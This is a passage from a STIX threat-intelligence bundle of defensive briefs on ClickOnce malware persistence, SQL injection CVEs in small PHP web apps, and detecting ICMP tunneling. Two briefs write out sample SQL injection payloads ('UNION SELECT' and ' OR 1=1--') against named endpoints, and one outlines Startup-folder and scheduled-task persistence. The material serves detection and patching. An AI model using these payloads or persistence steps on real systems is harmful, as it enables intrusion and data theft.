        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14719"
        },
        {
          "source_name": "reference",
          "url": "https://pastebin.com/Z4i5MGxk"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14719"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376307"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--47ad525e-4735-52c3-a12b-4e31b74f3672",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cfd7145a-928b-5c12-a57a-1ac31ff4f121",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--595afd0e-6793-5d2f-b45f-0b28f97bf821",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dfa8c070-2c76-5549-ba43-3aa25c009df0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--deadc6a3-6dac-5a46-80b2-9953c6c9d347",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd98231b-6fb1-5618-a15e-f26beeaf4544",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f9b1f05f-4a9c-58ee-84cf-05d365e63456",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d6031a81-6f54-5b26-a1b6-b6d1d4becd76",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Abuse ClickOnce for Stealthy Malware Delivery and Persistence",
      "description": "## Overview\n\nThreat actors are increasingly exploiting Microsoft's ClickOnce technology for stealthy malware delivery and persistence. This abuse leverages ClickOnce's inherent features, such as simplified application deployment with minimal user interaction and automatic updates, to bypass traditional security controls like email filtering and evade scrutiny often applied to executable files. Unlike conventional `.exe` installations, ClickOnce applications can be deployed without elevated privileges, lowering the barrier for attacks against standard user accounts. Adversaries also benefit from the legitimate appearance of ClickOnce processes, which execute payloads within trusted Microsoft binaries like `rundll32.exe` and `dfsvc.exe`, enhancing stealth. A notable abuse involves weaponizing `.appref-ms` files for both stealthy payload updates and establishing persistence via the Windows Startup folder or scheduled tasks, providing a reliable mechanism for remote access and malware updates to facilitate command and control or lateral movement.\n\n## Attack Chain\n\n1.  **Initial Access / Delivery:** Threat actors convince a user to click a malicious link or button, often through social engineering, leading to the download and execution of a ClickOnce `.application` file.\n2.  **Execution:** The `.application` file is launched, triggering the ClickOnce deployment process, often mediated by `explorer.exe` or a browser, from a user-writable location like Downloads or Temp.\n3.  **Payload Execution:** The malicious payload embedded within the ClickOnce application executes, often within the context of legitimate Microsoft processes such as `rundll32.exe` or `dfsvc.exe`, increasing stealth.\n4.  **Persistence (Initial Deployment):** An `.appref-ms` shortcut file is dropped in the user's Start Menu (e.g., `%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\`) if the application is configured for offline availability.\n5.  **Persistence (Scheduled Task / Startup Folder):** The attacker places the `.appref-ms` file in the Startup folder (`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`) or creates a scheduled task to automatically launch the malicious ClickOnce application.\n6.  **Command and Control / Updates:** Leveraging ClickOnce's built-in update mechanism, the attacker pushes malicious updates from a controlled server, allowing them to change C2 addresses, introduce new functionality, or update malware.\n7.  **Impact:** The updated malware gains persistent access, enabling capabilities such as data exfiltration, lateral movement within the network, or further system compromise.\n\n## Impact\n\nThe abuse of ClickOnce technology allows threat actors to bypass common security protections and establish persistent access within targeted environments. By tricking users into deploying seemingly legitimate applications, attackers can execute arbitrary code within trusted Microsoft processes, effectively hiding their malicious activities. This enables them to maintain remote access, update their malware (e.g., change C2 channels), move laterally across networks, and ultimately achieve objectives such as data exfiltration or deploying further destructive payloads like ransomware. The stealthy nature and minimal user interaction required make detection challenging, leading to prolonged compromise if not actively monitored.\n\n## Recommendation\n\n*   Configure endpoint detection and response (EDR) systems to monitor for the creation of `.appref-ms` files within critical system directories like user Startup folders, as detected by the `Detect .appref-ms Persistence in Startup Folder` rule.\n*   Implement robust logging for scheduled task creation and modification events, and deploy the `Detect Scheduled Task Creation Referencing .appref-ms` rule to identify persistence attempts.\n*   Enhance process creation logging to capture parent-child relationships and command-line arguments, specifically tuning for `explorer.exe` launching `.application` files from suspicious paths, as identified by the `Detect ClickOnce Application Launch from Suspicious Location` rule.\n*   Educate users on the risks associated with installing software from untrusted sources, even when prompted by seemingly legitimate system dialogues, and the behavior of ClickOnce applications.\n",
      "published": "2026-07-05T07:42:48Z",
      "labels": [
        "clickonce",
        "malware-delivery",
        "persistence",
        "defense-evasion",
        "initial-access",
        "execution",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--858afe5e-1829-5bdc-9cfd-5bf0dccfa7da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d8de20fa-5a94-57c3-bc99-5ecaf66fead4",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d8de20fa-5a94-57c3-bc99-5ecaf66fead4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14713 — SQL Injection in SourceCodester Pizzafy E-Commerce System",
      "description": "## Overview\n\nA significant security flaw, tracked as CVE-2026-14713, has been identified in the SourceCodester Pizzafy E-Commerce System 1.0. This vulnerability manifests as a remote SQL injection within the `/admin/ajax.php` file, specifically when handling the `ID` argument in the `action=confirm_order` context. Threat actors can exploit this by crafting malicious HTTP requests that embed SQL queries into the `ID` parameter. The flaw allows for unauthenticated remote exploitation, meaning attackers can leverage it without prior access to the system. The existence of a public exploit for this vulnerability elevates the immediate risk, making it critical for organizations using this software to patch or implement protective measures swiftly to prevent potential data breaches, unauthorized data manipulation, or system compromise.\n\n## Attack Chain\n\n1.  Attacker identifies a publicly accessible instance of SourceCodester Pizzafy E-Commerce System 1.0.\n2.  Attacker crafts a specially designed HTTP GET request targeting the `/admin/ajax.php` endpoint.\n3.  The request includes the `action=confirm_order` parameter and a malicious SQL payload embedded within the `ID` argument (e.g., `ID=1 UNION SELECT @@version, user(), database()`).\n4.  The vulnerable application processes this request, failing to properly sanitize the `ID` parameter, and executes the attacker-supplied SQL query against its backend database.\n5.  The database management system (DBMS) processes the injected query and returns the results within the legitimate HTTP response from the web server.\n6.  Attacker parses the web server's response to extract sensitive information, such as database schema, user credentials, system configuration, or other confidential data.\n7.  The attacker continues to refine payloads to further exfiltrate, modify, or potentially corrupt data within the database, ultimately achieving data compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14713 can lead to severe consequences for organizations utilizing SourceCodester Pizzafy E-Commerce System 1.0. As a remote SQL injection vulnerability, attackers can gain unauthorized access to the underlying database. This typically results in full data compromise, including exfiltration of sensitive customer data (names, addresses, payment information), administrative credentials, and other proprietary business data. Attackers could also tamper with order details, pricing, inventory, or user accounts, causing financial losses, reputational damage, and operational disruption. While the source does not specify victim count or targeted sectors, any organization deploying this specific version of the e-commerce system is at high risk.\n\n## Recommendation\n\n*   Immediately patch SourceCodester Pizzafy E-Commerce System 1.0 to a non-vulnerable version if available.\n*   Deploy the Sigma rule \"Detects CVE-2026-14713 Exploitation — Pizzafy SQL Injection\" to your SIEM/WAF and tune for your environment.\n*   Enable comprehensive web server logging (category `webserver`) to capture `cs-uri-stem`, `cs-uri-query`, and `cs-method` for detailed forensic analysis.\n",
      "published": "2026-07-05T06:26:12Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "sourcecodester",
        "e-commerce"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14713"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/J4ng3ay/CVE/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14713"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846718"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376303"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376303/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e53a56f-19cb-5b79-8f73-5e7e344532fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--facd72e2-1684-5010-b66e-7c1745c9b873",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--facd72e2-1684-5010-b66e-7c1745c9b873",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14705: SQL Injection in code-projects Online Examination 1.0",
      "description": "## Overview\n\nA remote SQL injection vulnerability, identified as CVE-2026-14705, has been discovered in version 1.0 of the code-projects Online Examination web application. This flaw resides within the `head.php` component, where insufficient sanitization of the `uname` (username) and `password` arguments allows an attacker to inject arbitrary SQL commands. This can lead to unauthorized data access, modification, or potential control over the database, thereby compromising the integrity and confidentiality of the examination system. The vulnerability is network-exploitable and does not require authentication, making it a significant risk. The exploit for this vulnerability has been publicly disclosed, increasing the likelihood of its utilization by malicious actors, and necessitating immediate attention from organizations running this specific software version.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a publicly accessible instance of `code-projects Online Examination 1.0`.\n2.  The attacker crafts a malicious HTTP request (GET or POST) targeting the `head.php` endpoint of the application.\n3.  Within the HTTP request, the attacker injects SQL metacharacters and commands into the `uname` or `password` parameters.\n4.  The vulnerable `head.php` script processes the request without adequately sanitizing the input fields.\n5.  The backend database executes the attacker's injected SQL commands, often leading to authentication bypass, data exfiltration, or further database manipulation.\n6.  The attacker gains unauthorized access to the application's functionality, database records, or potentially elevates privileges within the database context.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14705 could lead to severe consequences for organizations using code-projects Online Examination 1.0. Attackers can bypass authentication mechanisms, access sensitive student or exam data (e.g., personally identifiable information, test scores, questions), and potentially alter or delete critical database records. This could result in data breaches, academic fraud, reputational damage, and regulatory non-compliance. Given the public disclosure of the exploit, any internet-facing instance of the affected application is at immediate risk of exploitation, potentially affecting an unknown number of educational institutions or businesses using this platform.\n\n## Recommendation\n\n*   Immediately remove `code-projects Online Examination 1.0` from production environments or apply vendor-provided patches as soon as they become available to mitigate CVE-2026-14705.\n*   Implement strong input validation and parameterized queries for all user-supplied input, especially for the `uname` and `password` fields, to prevent SQL injection attacks.\n*   Deploy a Web Application Firewall (WAF) in front of web applications to detect and block malicious requests attempting to exploit CVE-2026-14705, specifically looking for SQL injection payloads.\n*   Deploy the Sigma rule provided in this brief to your SIEM solution to detect attempted exploitation of this vulnerability.\n",
      "published": "2026-07-05T06:25:32Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14705"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14705"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/zzzxc643/CVE1/blob/main/project1/vul1.md"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a05e460d-5367-5941-8ac6-fac388741a52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12ff45ce-9be9-58a7-ad36-21320a8e8422",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--12ff45ce-9be9-58a7-ad36-21320a8e8422",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14700: Code-Projects Internship Management System SQL Injection Vulnerability",
      "description": "## Overview\n\nCVE-2026-14700 details an unauthenticated SQL injection vulnerability affecting code-projects Internship Management System version 1.0. The flaw resides within an unknown function of the `employer/login.php` file, specifically impacting the Employer Login Endpoint. Attackers can remotely exploit this by manipulating the `email` or `password` arguments passed to this endpoint, allowing them to inject malicious SQL queries. The vulnerability has been publicly disclosed and is reported to be exploitable, enabling adversaries to bypass authentication, gain unauthorized access, and potentially extract sensitive data from the underlying database. This presents a significant risk to organizations using the affected system, as it can lead to data breaches, system compromise, and further attacks within the network.\n\n## Attack Chain\n\n1.  **Initial Access / Reconnaissance**: An unauthenticated attacker identifies a vulnerable instance of code-projects Internship Management System 1.0 exposed to the internet.\n2.  **Vulnerability Exploitation**: The attacker crafts a malicious HTTP POST request targeting the `employer/login.php` endpoint.\n3.  **SQL Injection Payload Delivery**: The crafted request includes SQL injection payloads within the `email` or `password` parameters (e.g., `' OR 1=1--`).\n4.  **Database Interaction**: The vulnerable application processes the malicious input, causing the embedded SQL query to be executed by the backend database.\n5.  **Authentication Bypass / Information Disclosure**: Successful injection allows the attacker to bypass authentication, potentially gain access to employer accounts, or extract sensitive information directly from the database.\n6.  **Data Exfiltration / Further Access**: Obtained credentials or data could then be used for further unauthorized access, data exfiltration, or to pivot to other systems.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14700 can lead to severe consequences for organizations utilizing the Internship Management System. Attackers can bypass authentication, gaining unauthorized access to the employer portal and potentially other system functionalities. This access enables the compromise of sensitive data stored in the database, including personal identifiable information (PII) of interns, employers, and potentially financial data. Such a breach can result in significant financial losses, reputational damage, regulatory penalties, and a complete loss of trust. The public disclosure of the exploit increases the likelihood of widespread opportunistic attacks against unpatched systems.\n\n## Recommendation\n\n*   **Patch CVE-2026-14700**: Immediately apply any available patches or updates from code-projects to address CVE-2026-14700.\n*   **Implement Input Validation**: Ensure robust input validation and parameterized queries are used in web applications, especially for user input like `email` and `password` on the `employer/login.php` endpoint.\n*   **Deploy Sigma Rule**: Deploy the 'CVE-2026-14700: Internship Management System SQLi Attempt' rule to your SIEM to detect exploitation attempts.\n*   **Monitor Web Server Logs**: Configure comprehensive logging for `webserver` events, specifically HTTP requests to `employer/login.1php`, to facilitate detection of malicious queries.\n",
      "published": "2026-07-05T05:19:08Z",
      "labels": [
        "sql-injection",
        "web-application",
        "initial-access",
        "php",
        "unauthenticated"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14700"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/zzzxc643/CVE1/blob/main/assessment/vul7.md"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14700"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846889"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376296"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376296/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--52831579-b429-5ae3-9159-6d06d9383198",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Non-Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1095",
          "url": "https://attack.mitre.org/techniques/T1095"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00fa253a-2eb8-59ed-ab98-689c55ba2766",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a1ed9660-1362-51e9-91a4-16335efaae8f",
      "target_ref": "attack-pattern--52831579-b429-5ae3-9159-6d06d9383198"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Protocol Tunneling",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1572",
          "url": "https://attack.mitre.org/techniques/T1572"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fbb128e8-47ae-5f4a-b510-0253446b6f08",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a1ed9660-1362-51e9-91a4-16335efaae8f",
      "target_ref": "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a1ed9660-1362-51e9-91a4-16335efaae8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detecting Potential ICMP Tunneling Activity for Covert C2 and Exfiltration",
      "description": "## Overview\n\nThis threat focuses on the sophisticated evasion technique known as ICMP tunneling, which allows adversaries to establish covert communication channels and exfiltrate data from compromised internal networks. Unlike legitimate ICMP traffic, which typically uses small, fixed-size packets for network diagnostics, ICMP tunneling tools embed malicious commands or exfiltrated data within the data payload section of ICMP Echo Request/Reply packets, significantly increasing their size (e.g., greater than 256 bytes). This method is particularly effective at bypassing network defenses that inspect higher-layer protocols but may overlook or allow ICMP traffic. The technique is often used for persistent command and control (C2) communication or to covertly transfer sensitive information out of a network, making it a critical concern for detection engineers. While no specific actor or campaign is detailed, this detection capability is vital for identifying any group employing this stealthy tactic.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains initial access to an internal host through various means, such as exploiting a vulnerable service, a successful phishing campaign, or credential compromise.\n2.  **Tool Deployment**: Once access is established, the attacker deploys a specialized ICMP tunneling client (e.g., `icmptunnel`, `ptunnel`, custom malware) onto the compromised internal system.\n3.  **Tunnel Client Configuration**: The deployed client is configured with the IP address of an external, attacker-controlled command and control (C2) server.\n4.  **Covert Channel Establishment**: The internal host initiates ICMP Echo Request (ping) packets directed towards the external C2 server over a network connection.\n5.  **Data Embedding**: Attacker commands, responses, or exfiltrated data are covertly embedded within the data payload section of these ICMP Echo Request packets, causing their size to be significantly larger than typical, legitimate pings (e.g., exceeding 256 bytes).\n6.  **Command and Control / Exfiltration**: The external C2 server receives these specially crafted large ICMP packets, extracts the embedded data, and replies with its own embedded commands or data via ICMP Echo Reply packets, maintaining a persistent and covert communication channel for C2 or data exfiltration.\n\n## Impact\n\nSuccessful ICMP tunneling allows attackers to maintain stealthy, persistent command and control over compromised internal systems, effectively bypassing common network security policies that might permit outbound ICMP traffic. The primary impact includes unauthorized data exfiltration, where sensitive information can be covertly transferred out of the organization's network. Additionally, it enables attackers to remotely issue commands, deploy further malware, or pivot to other systems, leading to broader network compromise, potential ransomware deployment, or long-term espionage. The covert nature of this communication makes detection challenging, increasing the dwell time of adversaries within the network.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM solution to detect unusually large ICMP Echo traffic originating from internal hosts to external destinations.\n*   Ensure that your network traffic logs (`network_connection` category) capture detailed ICMP transaction information, including packet sizes and types, as described in the Elastic setup notes.\n*   Review firewall policies to block or strictly limit outbound ICMP traffic, allowing only necessary types and sizes for approved monitoring paths, as suggested in the \"Response and remediation\" section.\n*   Investigate alerts from the Sigma rule by identifying the source host and correlating with endpoint telemetry for unusual process activity (e.g., non-standard ping utilities), as outlined in the \"Investigating Potential ICMP Tunneling Activity to the Internet\" guide.\n*   Regularly validate and update exceptions for known benign sources and destinations generating larger ICMP payloads (e.g., MTU discovery, specific monitoring tools) to minimize false positives, as noted in the \"False positive analysis.\"\n",
      "published": "2026-07-05T04:44:01Z",
      "labels": [
        "network-security",
        "command-and-control",
        "data-exfiltration",
        "icmp-tunneling",
        "elastic-detection-rule"
      ],
      "object_refs": [
        "attack-pattern--52831579-b429-5ae3-9159-6d06d9383198",
        "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_potential_icmp_tunneling_to_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1572/"
        },
        {
          "source_name": "reference",
          "url": "https://www.rfc-editor.org/rfc/rfc792"
        },
        {
          "source_name": "reference",
          "url": "https://www.levelblue.com/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa2bbe31-edc2-51dd-931f-a982e9f591d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1370dc31-b4a5-5929-b53a-69655cc78388",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1370dc31-b4a5-5929-b53a-69655cc78388",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14695: SourceCodester Multi-Vendor Online Grocery Management System SQL Injection",
      "description": "## Overview\n\nA significant vulnerability, identified as CVE-2026-14695, has been discovered in SourceCodester Multi-Vendor Online Grocery Management System version 1.0. This flaw specifically affects the `save_client` function located within the `classes/Users.php` file, which is part of the Registration Handler component. Attackers can remotely exploit this weakness by manipulating the 'Name' argument, leading to a classic SQL injection scenario. The presence of a publicly available exploit significantly escalates the risk, making affected systems immediate targets for data compromise or further malicious activity. This vulnerability has a CVSS v3.1 base score of 7.3, categorizing it as high severity due to its network-exploitability and potential for data impact.\n\n## Attack Chain\n\n1.  Attacker identifies a target running `SourceCodester Multi-Vendor Online Grocery Management System 1.0` through reconnaissance.\n2.  Attacker crafts a malicious HTTP POST request, targeting the `classes/Users.php` file and specifically the `save_client` function.\n3.  The crafted request includes an SQL injection payload embedded within the 'Name' argument, designed to bypass input validation.\n4.  Upon receipt, the vulnerable 